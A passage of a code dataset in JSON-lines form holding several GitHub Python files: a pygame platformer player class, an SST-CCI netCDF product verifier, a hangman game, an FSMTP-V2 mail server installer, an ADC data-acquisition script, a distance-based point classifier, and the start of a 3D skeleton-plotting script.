pygame.mixer.Sound(r'music/jump.wav')\n self.win = pygame.mixer.Sound(r'music/win.wav') # еще не спас принцессу\n self.dead = pygame.mixer.Sound(r'music/dead.wav')\n\n self.image.set_colorkey(Colors.PURPLE) # прозрачный фон\n persAnim = []\n persAnimSuperSpeed = []\n for anim in CHARACTER_RIGHT:\n persAnim.append((anim, CHARACTER_DELAY))\n persAnimSuperSpeed.append((anim, ANIMATION_SUPER_SPEED_DELAY))\n self.persAnimRight = pyganim.PygAnimation(persAnim)\n self.persAnimRight.play()\n self.persAnimRightSuperSpeed = pyganim.PygAnimation(persAnimSuperSpeed)\n self.persAnimRightSuperSpeed.play()\n\n persAnim = []\n persAnimSuperSpeed = []\n for anim in CHARACTER_LEFT:\n persAnim.append((anim, CHARACTER_DELAY))\n persAnimSuperSpeed.append((anim, ANIMATION_SUPER_SPEED_DELAY))\n self.persAnimLeft = pyganim.PygAnimation(persAnim)\n self.persAnimLeft.play()\n self.persAnimLeftSuperSpeed = pyganim.PygAnimation(persAnimSuperSpeed)\n self.persAnimLeftSuperSpeed.play()\n\n self.persAnimStay = pyganim.PygAnimation(CHARACTER_STOP)\n self.persAnimStay.play()\n self.persAnimStay.blit(self.image, (0, 0)) # По-умолчанию, стоим\n\n self.persAnimJumpLeft = pyganim.PygAnimation(CHARACTER_JUMP_LEFT)\n self.persAnimJumpLeft.play()\n\n self.persAnimJumpRight = pyganim.PygAnimation(CHARACTER_JUMP_RIGHT)\n self.persAnimJumpRight.play()\n\n self.persAnimJump = pyganim.PygAnimation(CHARACTER_JUMP)\n self.persAnimJump.play()\n\n def update(self, platforms, running):\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT]: # движение влево\n self.xvel = -SPEED_MOVE\n self.image.fill(Colors.PURPLE)\n if running:\n self.xvel -= MOVE_EXTRA_SPEED\n if not keys[pygame.K_UP] or not keys[pygame.K_SPACE]:\n self.persAnimLeftSuperSpeed.blit(self.image, (0, 0))\n else:\n if not keys[pygame.K_UP] or not keys[pygame.K_SPACE]:\n self.persAnimLeft.blit(self.image, (0, 0))\n if keys[pygame.K_UP] or keys[pygame.K_SPACE]:\n self.persAnimJumpLeft.blit(self.image, (0, 0))\n\n if keys[pygame.K_RIGHT]: # движение вправо\n self.xvel = SPEED_MOVE\n self.image.fill(Colors.PURPLE)\n if running:\n self.xvel += MOVE_EXTRA_SPEED\n if not keys[pygame.K_UP] or not keys[pygame.K_SPACE]:\n self.persAnimRightSuperSpeed.blit(self.image, (0, 0))\n else:\n if not keys[pygame.K_UP] or not keys[pygame.K_SPACE]:\n self.persAnimRight.blit(self.image, (0, 0))\n if keys[pygame.K_UP] or keys[pygame.K_SPACE]:\n self.persAnimJumpRight.blit(self.image, (0, 0))\n\n if keys[pygame.K_UP] or keys[pygame.K_SPACE]: # прыжок\n if self.GroundPosition:\n self.yvel = -JUMP_POWER\n if running and (keys[pygame.K_RIGHT] or keys[pygame.K_LEFT]):\n self.yvel -= JUMP_EXTRA_POWER\n self.jump.play()\n self.image.fill(Colors.PURPLE)\n self.persAnimJump.blit(self.image, (0, 0))\n\n if not (keys[pygame.K_LEFT] or keys[pygame.K_RIGHT]): # стоим на месте\n self.xvel = 0\n if not (keys[pygame.K_UP] or keys[pygame.K_SPACE]):\n self.image.fill(Colors.PURPLE)\n self.persAnimStay.blit(self.image, (0, 0))\n\n if keys[pygame.K_LCTRL] and keys[pygame.K_s]:\n self.startX = self.rect.x\n self.startY = self.rect.y\n\n if not self.GroundPosition:\n self.yvel += GRAVITY\n\n self.GroundPosition = False\n self.rect.y += self.yvel\n self.collide(0, self.yvel, platforms)\n self.rect.x += self.xvel\n self.collide(self.xvel, 0, platforms)\n\n def collide(self, xvel, yvel, platforms):\n for platf in platforms:\n if pygame.sprite.collide_rect(self, platf): # если есть пересечение платформы с игроком\n if xvel > 0: # если движется вправо\n self.rect.right = platf.rect.left # то не движется вправо\n\n if xvel < 0: # если движется влево\n self.rect.left = platf.rect.right # то не движется влево\n\n if yvel > 0: # если падает вниз\n self.rect.bottom = platf.rect.top # то не падает вниз\n self.GroundPosition = True # и становится на что-то твердое\n self.yvel = 0 # и энергия падения пропадает\n\n if yvel < 0: # если движется вверх\n self.rect.top = platf.rect.bottom # то не движется вверх\n self.yvel = 0 # и энергия прыжка пропадает\n\n if isinstance(platf, Levels.DieBlock) or isinstance(platf, Monsters.Monster):\n self.die()\n\n elif isinstance(platf, Levels.Princes):\n main.menu_sound.stop()\n self.win.play()\n pygame.time.wait(4000)\n end_bg = pygame.image.load(r'images/backgrounds/level_passed.jpg')\n ScreenSettings.gameScreen.blit(end_bg, (0, 0))\n pygame.display.update()\n pygame.time.wait(1500)\n Menu.menu()\n\n def die(self):\n if self.health == 0:\n main.menu_sound.stop()\n self.dead.play()\n pygame.time.wait(1000)\n end_bg = pygame.image.load(r'images/backgrounds/background_end.jpg')\n ScreenSettings.gameScreen.blit(end_bg, (0, 0))\n pygame.display.update()\n pygame.time.wait(2000)\n sys.exit(-1)\n self.health -= 1\n\n self.teleporting(self.startX, self.startY)\n\n def teleporting(self, go_x, go_y):\n self.rect.x = go_x\n self.rect.y = go_y\n","repo_name":"Nezoxxxd/git-KourseGame","sub_path":"Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":8185,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"5299115315","text":"import os\nimport re\n\nimport numpy as np\nimport numpy.ma as ma\nfrom netCDF4._netCDF4 import Dataset\n\nfrom cci.sst.qa.product_type import L2P, L3U, L4\nfrom cci.sst.qa.verification_error import VerificationError\n\n\nclass SstProductVerifier:\n\n def __init__(self, report, source_pathname):\n self.report = report\n self.source_pathname = source_pathname\n self.filename_patterns = {'[0-9]{14}-ESACCI-L2P_GHRSST-.*\\\\.nc': L2P(), '[0-9]{14}-ESACCI-L3U_GHRSST-.*\\\\.nc': L3U(), '[0-9]{14}-ESACCI-L4_GHRSST-.*\\\\.nc': L4(), }\n\n def check_source_pathname(self):\n ok = os.path.isfile(self.source_pathname)\n if ok:\n self.report['source_pathname_check'] = float(0)\n else:\n self.report['source_pathname_check'] = float(1)\n self.report['source_pathname_check_failed_for'] = self.source_pathname\n raise VerificationError\n\n def check_source_filename(self):\n \"\"\"\n\n :rtype : ProductType\n \"\"\"\n product_type = None\n\n filename = os.path.basename(self.source_pathname)\n for p, t in self.filename_patterns.items():\n if re.match(p, filename):\n product_type = t\n break\n\n if product_type is not None:\n self.report['source_filename_check'] = float(0)\n return product_type\n else:\n self.report['source_filename_check'] = float(1)\n filename = os.path.basename(self.source_pathname)\n self.report['source_filename_check_failed_for'] = filename\n raise VerificationError\n\n def check_product_can_be_opened(self):\n \"\"\"\n\n :rtype : Dataset\n \"\"\"\n try:\n dataset = Dataset(self.source_pathname)\n dataset.set_auto_maskandscale(False)\n self.report['product_can_be_opened_check'] = float(0)\n return dataset\n except:\n self.report['product_can_be_opened_check'] = float(1)\n filename = os.path.basename(self.source_pathname)\n self.report['product_can_be_opened_check_failed_for'] = filename\n raise VerificationError\n\n def check_product_version(self, dataset):\n \"\"\"\n\n :rtype : str\n \"\"\"\n try:\n version = dataset.getncattr(\"product_version\")\n if version is None:\n raise VerificationError\n\n self.report['product_has_version_check'] = float(0)\n return version\n except:\n self.report['product_has_version_check'] = float(1)\n filename = os.path.basename(self.source_pathname)\n self.report['product_has_version_failed_for'] = filename\n raise VerificationError\n\n def check_dataset(self, dataset, product_type):\n \"\"\"\n\n :type dataset: Dataset\n :type product_type: ProductType\n \"\"\"\n try:\n self._check_variable_existence(dataset, product_type)\n self._check_variable_limits(dataset)\n self._check_geophysical(dataset, product_type)\n self._check_sst_quality(dataset, product_type)\n self._check_mask_consistency(dataset, product_type)\n self._check_corruptness(dataset, product_type)\n finally:\n try:\n dataset.close()\n except IOError:\n pass\n\n def _check_variable_existence(self, dataset, product_type):\n \"\"\"\n\n :type dataset: Dataset\n :type product_type: ProductType\n \"\"\"\n for variable_name in product_type.get_variable_names():\n if variable_name in dataset.variables:\n self.report[variable_name + '.existence_check'] = float(0)\n else:\n self.report[variable_name + '.existence_check'] = float(1)\n filename = os.path.basename(self.source_pathname)\n self.report[variable_name + '.existence_check_failed_for'] = filename\n\n def _check_variable_limits(self, dataset):\n \"\"\"\n\n :type dataset: Dataset\n \"\"\"\n for variable_name in dataset.variables:\n variable = dataset.variables[variable_name]\n self.report[variable_name + '.count.total'] = float(variable.size)\n\n data = self.__get_masked_data(variable)\n self.report[variable_name + '.count.valid'] = float(data.count())\n\n try:\n valid_max = variable.getncattr('valid_max')\n invalid_data = ma.masked_less_equal(data, valid_max)\n invalid_data_count = invalid_data.count()\n if invalid_data_count == 0:\n self.report[variable_name + '.valid_max_check'] = float(invalid_data_count)\n else:\n variable.getncattr('_FillValue')\n self.report[variable_name + '.valid_max_check'] = float(invalid_data_count)\n filename = os.path.basename(self.source_pathname)\n self.report[variable_name + '.valid_max_check_failed_for'] = filename\n except AttributeError:\n pass\n try:\n valid_min = variable.getncattr('valid_min')\n invalid_data = ma.masked_greater_equal(data, valid_min)\n invalid_data_count = invalid_data.count()\n self.report[variable_name + '.valid_min_check'] = float(invalid_data_count)\n if invalid_data_count == 0:\n self.report[variable_name + '.valid_min_check'] = float(invalid_data_count)\n else:\n variable.getncattr('_FillValue')\n self.report[variable_name + '.valid_min_check'] = float(invalid_data_count)\n filename = os.path.basename(self.source_pathname)\n self.report[variable_name + '.valid_min_check_failed_for'] = filename\n except AttributeError:\n pass\n\n def _check_geophysical(self, dataset, product_type):\n \"\"\"\n\n :type dataset: Dataset\n :type product_type: ProductType\n \"\"\"\n spec = product_type.get_geophysical_check_spec()\n if len(spec) == 4:\n a = SstProductVerifier.__get_data(dataset, spec[0], scale=True)\n b = SstProductVerifier.__get_data(dataset, spec[1], scale=True)\n d = a - b\n # count pixels with differences less than the minimum\n suspicious_data = ma.masked_greater_equal(d, spec[2])\n suspicious_data_count = suspicious_data.count()\n self.report['geophysical_minimum_check'] = float(suspicious_data_count)\n if suspicious_data_count > 0:\n filename = os.path.basename(self.source_pathname)\n self.report['geophysical_minimum_check_failed_for'] = filename\n # count pixels with differences greater than the maximum\n suspicious_data = ma.masked_less_equal(d, spec[3])\n suspicious_data_count = suspicious_data.count()\n self.report['geophysical_maximum_check'] = float(suspicious_data_count)\n if suspicious_data_count > 0:\n filename = os.path.basename(self.source_pathname)\n self.report['geophysical_maximum_check_failed_for'] = filename\n\n def _check_sst_quality(self, dataset, product_type):\n mask_specs = product_type.get_mask_consistency_check_specs()\n if len(mask_specs) == 0:\n return\n\n sst_variable_names = product_type.get_sst_variable_names()\n if len(sst_variable_names) == 0:\n return\n\n quality_variable_name = mask_specs[0][2]\n quality_data = dataset.variables[quality_variable_name][:]\n\n valid_retrieval_quality = ma.masked_less(quality_data, 2)\n self.report[\"sst_valid_retrieval\"] = float(valid_retrieval_quality.count())\n\n failed_retrieval_quality = ma.masked_not_equal(quality_data, 1)\n sst_variable = dataset.variables[sst_variable_names[0]]\n fill_value = sst_variable.getncattr('_FillValue')\n sst_quality_one_data = ma.array(sst_variable[:], mask=failed_retrieval_quality.mask)\n\n invalid_retrieval = ma.masked_equal(sst_quality_one_data, fill_value)\n self.report[\"sst_invalid_retrieval\"] = float(invalid_retrieval.count())\n\n failed_retrieval = ma.masked_not_equal(sst_quality_one_data, fill_value)\n self.report[\"sst_failed_retrieval\"] = float(failed_retrieval.count())\n\n not_ocean = ma.masked_not_equal(quality_data, 0)\n self.report[\"not_ocean\"] = float(not_ocean.count())\n\n def _check_mask_consistency(self, dataset, product_type):\n \"\"\"\n\n :type dataset: Dataset\n :type product_type: ProductType\n \"\"\"\n\n consistency_check_specs = product_type.get_mask_consistency_check_specs()\n if len(consistency_check_specs) == 0:\n return\n\n quality_variable_name = consistency_check_specs[0][2]\n quality_data = dataset.variables[quality_variable_name][:]\n quality_masks = {}\n for level in range(0, 6):\n level_mask = ma.masked_not_equal(quality_data, level).mask\n quality_masks.update({level: level_mask})\n\n for spec in consistency_check_specs:\n reference_variable_name = spec[0]\n objective_variable_name = spec[1]\n quality_variable_name = spec[2]\n\n if quality_variable_name in dataset.variables:\n quality_levels = spec[3]\n for l in quality_levels:\n level_mask = quality_masks[l]\n a = SstProductVerifier.__get_data_of_quality(dataset, reference_variable_name, level_mask).mask\n b = SstProductVerifier.__get_data_of_quality(dataset, objective_variable_name, level_mask).mask\n # false negatives: element is not masked in a, but masked in b\n check_name = objective_variable_name + '.' + 'mask_false_negative_check_' + str(l)\n self.__check_false_negatives(a, b, check_name)\n # false positives: element is masked in a, but not masked in b\n check_name = objective_variable_name + '.' + 'mask_false_positive_check_' + str(l)\n self.__check_false_positives(a, b, check_name)\n else:\n a = SstProductVerifier.__get_data(dataset, reference_variable_name).mask\n b = SstProductVerifier.__get_data(dataset, objective_variable_name).mask\n # false negatives: element is not masked in a, but masked in b\n check_name = objective_variable_name + '.mask_false_negative_check'\n self.__check_false_negatives(a, b, check_name)\n # false positives: element is masked in a, but not masked in b\n check_name = objective_variable_name + '.' + 'mask_false_positive_check'\n self.__check_false_positives(a, b, check_name)\n\n def _check_corruptness(self, dataset, product_type):\n \"\"\"\n\n :type dataset: Dataset\n :type product_type: ProductType\n \"\"\"\n ok = True\n for variable_name in product_type.get_sst_variable_names():\n if variable_name in dataset.variables:\n variable = dataset.variables[variable_name]\n\n data = SstProductVerifier.__get_masked_data(variable)\n valid_data_count = data.count()\n if valid_data_count == 0:\n ok = False\n try:\n valid_max = variable.getncattr('valid_max')\n invalid_data = ma.masked_less_equal(data, valid_max)\n valid_data_count = valid_data_count - invalid_data.count()\n except AttributeError:\n pass\n try:\n valid_min = variable.getncattr('valid_min')\n invalid_data = ma.masked_greater_equal(data, valid_min)\n valid_data_count = valid_data_count - invalid_data.count()\n except AttributeError:\n pass\n if valid_data_count == 0:\n ok = False\n else:\n ok = False\n if ok:\n self.report['corruptness_check'] = float(0)\n else:\n self.report['corruptness_check'] = float(1)\n filename = os.path.basename(self.source_pathname)\n self.report['corruptness_check_failed_for'] = filename\n raise VerificationError\n\n @staticmethod\n def __get_masked_data(variable):\n \"\"\"\n\n :type variable: Variable\n :rtype : ma.MaskedArray\n \"\"\"\n data = variable[:]\n try:\n fill_value = variable.getncattr('_FillValue')\n return ma.masked_equal(data, fill_value)\n except AttributeError:\n return ma.array(data)\n\n @staticmethod\n def __get_data(dataset, variable_name, scale=False):\n \"\"\"\n\n :type dataset: Dataset\n :type variable_name: str\n :type scale: bool\n :rtype : ma.MaskedArray\n \"\"\"\n variable = dataset.variables[variable_name]\n data = SstProductVerifier.__get_masked_data(variable)\n if scale:\n scale_factor, add_offset = SstProductVerifier._get_scale_and_offset(variable)\n if scale_factor != 1.0 or add_offset != 0.0:\n data = data * scale_factor + add_offset\n return data\n\n @staticmethod\n def __get_data_of_quality(dataset, variable_name, level_mask, scale=False):\n \"\"\"\n\n :type dataset: Dataset\n :type variable_name: str\n :type level_mask: Object\n :type scale: bool\n :rtype : ma.MaskedArray\n \"\"\"\n variable = dataset.variables[variable_name]\n data = SstProductVerifier.__get_masked_data_of_quality(variable, level_mask)\n if scale:\n scale_factor, add_offset = SstProductVerifier._get_scale_and_offset(variable)\n if scale_factor != 1.0 or add_offset != 0.0:\n data = data * scale_factor + add_offset\n\n return data\n\n @staticmethod\n def __get_masked_data_of_quality(variable, level_mask):\n \"\"\"\n\n :type variable: Variable\n :type level_mask: Object\n :rtype : ma.MaskedArray\n \"\"\"\n data = ma.array(variable[:], mask=level_mask)\n try:\n fill_value = variable.getncattr('_FillValue')\n return ma.masked_equal(data, fill_value)\n except AttributeError:\n return data\n\n def __check_false_negatives(self, reference_mask, objective_mask, check_name):\n # noinspection PyNoneFunctionAssignment,PyUnresolvedReferences\n false_negatives = ma.masked_equal(np.logical_or(np.logical_not(reference_mask), objective_mask), True)\n false_negatives_count = false_negatives.count()\n self.report[check_name] = float(false_negatives_count)\n if false_negatives_count > 0:\n filename = os.path.basename(self.source_pathname)\n self.report[check_name + '_failed_for'] = filename\n\n def __check_false_positives(self, reference_mask, objective_mask, check_name):\n # noinspection PyNoneFunctionAssignment,PyUnresolvedReferences\n false_positives = ma.masked_equal(np.logical_or(np.logical_not(objective_mask), reference_mask), True)\n false_positives_count = false_positives.count()\n self.report[check_name] = float(false_positives_count)\n if false_positives_count > 0:\n filename = os.path.basename(self.source_pathname)\n self.report[check_name + '_failed_for'] = filename\n\n @staticmethod\n def _get_scale_and_offset(variable):\n try:\n scale_factor = variable.getncattr('scale_factor')\n except AttributeError:\n scale_factor = 1.0\n\n try:\n add_offset = variable.getncattr('add_offset')\n except AttributeError:\n add_offset = 0.0\n\n return scale_factor, add_offset\n","repo_name":"bcdev/sst-cci-toolbox","sub_path":"quality-assessment/cci/sst/qa/sst_product_verifier.py","file_name":"sst_product_verifier.py","file_ext":"py","file_size_in_byte":16024,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"40"} +{"seq_id":"22394406875","text":"import operative\nimport sketch\nfrom random_word import RandomWords\n\n\nprint('H A N G M A N')\n\ndifficulty = 'X'\n\nwhile difficulty not in 'EMH':\n print('Select difficulty: E - Easy, M - Medium, H - Hard')\n difficulty = input()[0].upper()\n\nmax_length = operative.set_max_length(difficulty)\n\nmissed_letters = ''\ncorrect_letters = ''\nsecret_word = (\n RandomWords()\n .get_random_word(\n hasDictionaryDef=\"true\",\n maxLength=max_length\n )\n)\n\ngame_is_done = False\n\nwhile True:\n operative.display_board(missed_letters, correct_letters, secret_word)\n\n # Let the player enter a letter.\n guess = operative.get_guess(missed_letters + correct_letters)\n\n if guess in secret_word:\n correct_letters = correct_letters + guess\n\n # Check if the player has won.\n found_all_letters = True\n for i in range(len(secret_word)):\n if secret_word[i] not in correct_letters:\n found_all_letters = False\n break\n if found_all_letters:\n print('Yes! The secret word is \"' + secret_word + '\"! You have won!')\n game_is_done = True\n else:\n missed_letters = missed_letters + guess\n\n # Check if player has guessed too many times and lost.\n if len(missed_letters) == len(sketch.HANGMAN_PICS) - 1:\n operative.display_board(missed_letters, correct_letters, secret_word)\n print('You have run out of guesses!\\nAfter '\n + str(len(missed_letters))\n + ' missed guesses and '\n + str(len(correct_letters))\n + ' correct guesses, the word was \"'\n + secret_word + '\"')\n game_is_done = True\n\n # Ask the player if they want to play again (but only if the game is done).\n if game_is_done:\n if operative.play_again():\n missed_letters = ''\n correct_letters = ''\n game_is_done = False\n secret_word = (\n RandomWords()\n .get_random_word(\n hasDictionaryDef=\"true\",\n maxLength=max_length\n )\n )\n else:\n break\n","repo_name":"troutrun/Invent-Game-Python","sub_path":"hangman-game/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24607429594","text":"#!/bin/python3\n\nimport platform\nimport argparse\nfrom enum import Enum\nimport sys\nimport os\n\nTHREADS=4\n\nclass InstallationTemplate(Enum):\n\tDebianLinux = 0\n\tArchLinux = 1\n\tUnknownLinux = 2\n\tAlpineLinux = 3\n\n\tdef detect():\n\t\tsystem = platform.system().lower()\n\t\trelease = platform.release().lower()\n\n\t\tprint(f'Detecting platform for \\'{system}\\' -> \\'{release}\\'')\n\n\t\tif system == 'linux':\n\t\t\tif release.find('alpine'):\n\t\t\t\treturn InstallationTemplate.AlpineLinux\n\t\t\telif release.find('arch') or release.find('manjaro'):\n\t\t\t\treturn InstallationTemplate.ArchLinux\n\t\t\telif release.find('ubuntu') or release.find('debian'):\n\t\t\t\treturn InstallationTemplate.DebianLinux\n\t\t\telse:\n\t\t\t\tprint(f'Your current linux distro \\'{release}\\' is not supported yet')\n\t\t\t\treturn InstallationTemplate.UnknownLinux\n\t\telse:\n\t\t\tprint('{system} is not supported by FSMTP-V2')\n\n\ndef install_repository(url, dir):\n\tprint(f'Installing repository \\'{url}\\' into \\'{dir}\\'')\n\n\tos.system('mkdir -p ./dependencies')\n\tos.chdir('./dependencies')\n\tos.system(f'git clone --recursive {url} ./{dir}')\n\tos.chdir(f'./{dir}')\n\tos.system('mkdir -p ./build')\n\tos.chdir('./build')\n\tos.system(f'cmake ../ && make -j {THREADS} && make install')\n\tos.chdir('../../../')\n\ndef install_dependencies(template):\n\tcommands = list()\n\n\tif (template == InstallationTemplate.ArchLinux):\n\t\tcommands.append('pacman -Syyy');\n\t\tcommands.append('pacman -S meson ninja python python-pip gcc make cmake openssl pkg-config')\n\telif (template == InstallationTemplate.DebianLinux):\n\t\tcommands.append('apt-get update')\n\t\tcommands.append('apt-get upgrade')\n\t\tcommands.append('apt-get install ninja-build meson python3 python3-pip gcc make cmake openssl pkg-config')\n\telif (template == InstallationTemplate.AlpineLinux):\n\t\tcommands.append('apk add build-base openssl meson make cmake ninja git libuv')\n\n\tcommands.append('ldconfig')\n\tcommands.append('pip3 install pyOpenSSL cassandra-driver || pip install pyOpenSSL cassandra-driver')\n\n\tprint(f'[DEPENDENCIES] Starting execution of {len(commands)} commands')\n\tfor i, command in enumerate(commands):\n\t\tprint(f'{i} -> Executing command \\'{command}\\'')\n\t\tos.system(command)\n\n\ndef install():\n\tcommands = list()\n\n\tcommands.append('mkdir -p env && mkdir -p env/keys')\n\tcommands.append('python ./initdb.py')\n\tcommands.append('python ./gencert.py')\n\n\tcommands.append('mkdir -p env && touch env/meson.build')\n\tcommands.append('meson build && cd ./build && ninja')\n\n\tprint(f'Starting execution of {len(commands)} commands')\n\tfor i, command in enumerate(commands):\n\t\tprint(f'{i} -> Executing command \\'{command}\\'')\n\t\tos.system(command)\n\n\"\"\"\n\tStarts the installation\n\"\"\"\n\ntemplate = InstallationTemplate.detect()\nprint(f'Detected template: {template}')\nif (template == InstallationTemplate.UnknownLinux):\n\tsys.exit(0)\n\ninstall_dependencies(template)\ninstall_repository('https://github.com/onqtam/doctest', 'doctest')\ninstall_repository('https://github.com/nickbruun/hayai', 'hayai')\ninstall_repository('https://github.com/nlohmann/json', 'json')\ninstall_repository('https://github.com/open-source-parsers/jsoncpp', 'jsoncpp')\ninstall_repository('https://github.com/pantor/inja', 'inja')\ninstall_repository('https://github.com/redis/hiredis', 'hiredis')\ninstall_repository('https://github.com/datastax/cpp-driver', 'cpp-driver')\ninstall_repository('https://github.com/catchorg/Catch2', 'Catch2')\ninstall()\n\n\"\"\"\n\tGenerates and installs the service\n\"\"\"\n\nservice = f\"\"\"[Unit]\nDescription=FSMTP-V2 Email server\n\n[Service]\nType=simple\nExecStart={os.getcwd()}/build/fsmtp\nWorkingDirectory={os.getcwd()}/build\nRestart=on-failure\n\n[Install]\nWantedBy=multi-user.target\"\"\"\n\nwith open('/lib/systemd/system/fsmtp.service', 'w+') as f:\n\tf.write(service)\n\nos.system('systemctl daemon-reload')\nos.system('systemctl enable fsmtp && systemctl start fsmtp')","repo_name":"skywa04885/fsmtp-v2","sub_path":"install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":3802,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"27835537129","text":"from time import time\nfrom data_writer import DataWriter\nfrom adc_board import ADCBoard\nimport logging\nimport argparse\n\n# Load data from CSV\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=\"\")\n\nparser.add_argument('-hz', '--datarate', nargs=1,\n help='sampling rate')\nparser.add_argument('-o', '--output_file', nargs=1,\n help='name of outputfile')\n\nargs = parser.parse_args()\n\ndatarateinput = args.datarate[0]\noutputfileinput = args.output_file[0]\n\nlogging.getLogger().setLevel(logging.INFO)\n\ndef read_continously(outputfile, channel_numbers, channel_names, **data_writer_kwargs):\n adc = ADCBoard()\n adc.drate = datarateinput if datarateinput is not None else 100\n writer = DataWriter(outfile=outputfile, columns=channel_names, **data_writer_kwargs)\n adc.setup_channels(channel_numbers)\n start_time = time()\n with writer as w:\n try:\n while True:\n result = adc.read_channels(channel_names[1:])\n w.write_row(tstamp=time(), **result)\n if time() - start_time > 1:\n logging.info(';' .join(f'{k}={v:.3f} V' for k,v in result.items()))\n start_time = time()\n except KeyboardInterrupt:\n pass\n\n\nif __name__ == \"__main__\":\n channel_names = 'tstamp L R U D S_H S_V'.split()\n channel_numbers = [7,6,5,4,(1,2),(0,2)]\n outputfile = outputfileinput if outputfileinput is not None else 'outputfile_daq_adc.csv' \n read_continously(channel_names=channel_names, channel_numbers=channel_numbers, outputfile=outputfile, comments = '')","repo_name":"bedakno/extraction_control","sub_path":"Python/data_acquisition/daq_adc.py","file_name":"daq_adc.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22550816928","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nfrom distance_meter import MinkovskyMeter, Furthest, SumabsMeter\nfrom distance_meter import Centroid\n\nclasses = np.array(\n [[[0.05, 0.91],\n [0.14, 0.96],\n [0.16, 0.9],\n [0.07, 0.7],\n [0.2, 0.63]],\n\n [[0.49, 0.89],\n [0.34, 0.81],\n [0.36, 0.67],\n [0.47, 0.49],\n [0.52, 0.53]],\n\n [[0.62, 0.83],\n [0.79, 0.92],\n [0.71, 0.92],\n [0.78, 0.83],\n [0.87, 0.92]],\n\n [[0.55, 0.4],\n [0.66, 0.32],\n [0.74, 0.49],\n [0.89, 0.3],\n [0.77, 0.2]],\n\n [[0.31, 0.43],\n [0.45, 0.27],\n [0.33, 0.16],\n [0.56, 0.29],\n [0.54, 0.13]],\n\n [[0.05, 0.15],\n [0.09, 0.39],\n [0.13, 0.51],\n [0.25, 0.34],\n [0.15, 0.36]]])\n\n\ndef user_input():\n while True:\n try:\n x = float(input('enter x value: '))\n y = float(input('enter y value: '))\n return [x, y]\n except ValueError:\n continue\n\ndef classify(lens):\n index = lens.index(min(lens))\n\n return str(index + 1)\n\n\nnew_object = user_input()\nprint('\\n************\\n************\\n')\nprint('\\nMinkovsky lambda=5, centroid')\nlens = [Centroid().calc(new_object, i, MinkovskyMeter(5)) for i in classes]\nprint(lens)\nprint('Classified to class ' + classify(lens))\n\nprint('\\nMinkovsky labmda=5, furthest')\nlens = [Furthest().calc(new_object, i, MinkovskyMeter(5)) for i in classes]\nprint(lens)\nprint('Classified to class ' + classify(lens))\n\nprint('\\nSumabs, centroid')\nlens = [Centroid().calc(new_object, i, SumabsMeter()) for i in classes]\nprint(lens)\nprint('Classified to class ' + classify(lens))\n\nprint('\\nSumabs, furthest')\nlens = [Furthest().calc(new_object, i, SumabsMeter()) for i in classes]\nprint(lens)\nprint('Classified to class ' + classify(lens))\n\nfor i, class_i in enumerate(classes):\n plt.plot(class_i[:, 0], class_i[:, 1], '*')\n\nplt.legend(['1','2','3','4','5','6'])\nplt.plot(new_object[0], new_object[1], 'X', c='000')\n\nplt.show()\n","repo_name":"SlonSky/ai-labs","sub_path":"001/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71659359479","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport cv2\nimport math, random\n\ndef draw_skeleton_3d_dynamic(pts3d_list, save_dir=None, elev = -90, azim=-90, axis_lim=[-0.5, 0.5]):\n\tif save_dir is not None:\n\t\tif not os.path.exists(save_dir):\n\t\t\tos.makedirs(save_dir)\n\n\tplt.rcParams['image.interpolation'] = 'nearest'\n\tfig = plt.figure()\n\n\tax = fig.add_subplot(111, projection='3d')\n\tax.view_init(elev = elev, azim=azim)\n\tax.set_xlabel('X Label')\n\tax.set_ylabel('Y Label')\n\tax.set_zlabel('Z Label')\n\n\tbody_edges = np.array([[0,1],[1,3],[2,0],[4,2],[5,7],[6,5],[7,9],[8,6],[10,8],[11,5],[12,6],[12,11],[13,11],[14,12],[15,13],[16,14]])\n\tcolors = plt.cm.hsv(np.linspace(0, 1, 10)).tolist()\n\tn_pts = pts3d_list[0].shape[0]\n\n\tfor i,pts3d in enumerate(pts3d_list):\n\t\tax.clear()\n\t\tax.set_xlim(axis_lim)\n\t\tax.set_ylim(axis_lim)\n\t\tax.set_zlim(axis_lim)\n\n\t\t# Draw points:\n\t\tax.plot(*zip(*pts3d), marker='o', color='r', ls='', markersize=5)\n\n\t\t# Draw edges:\n\t\tfor edge in body_edges:\n\t\t\tif edge[0] < n_pts and edge[1] < n_pts:\n\t\t\t\tax.plot(pts3d[edge,0], pts3d[edge,1], pts3d[edge,2], color=colors[1])\n\n\t\tif save_dir is None:\n\t\t\tplt.pause(0.000001)\n\t\telse:\n\t\t\tpath = os.path.join(save_dir, str(i).zfill(5) + '.jpeg')\n\t\t\tfig.savefig(path)#, bbox_inches='tight', pad_inches = 0)\n\n\t\tprint('{}/{} '.format(i+1, len(pts3d_list)), end='\\r')\n\t\t\n\n\tplt.show()\n\ndef draw_skeleton_3d(pts3d, elev = -90, azim=-90, axis_lim=[-0.5, 0.5]):\n\tplt.rcParams['image.interpolation'] = 'nearest'\n\tfig = plt.figure()\n\tax = fig.add_subplot(111, projection='3d')\n\tax.view_init(elev = elev, azim=azim)\n\tax.set_xlabel('X Label')\n\tax.set_ylabel('Y Label')\n\tax.set_zlabel('Z Label')\n\tax.axis('equal')\n\tax.set_xlim(axis_lim)\n\tax.set_ylim(axis_lim)\n\tax.set_zlim(axis_lim)\n\n\tbody_edges = np.array([[0,1],[1,3],[2,0],[4,2],[5,7],[6,5],[7,9],[8,6],[10,8],[11,5],[12,6],[12,11],[13,11],[14,12],[15,13],[16,14]])\n\tcolors = 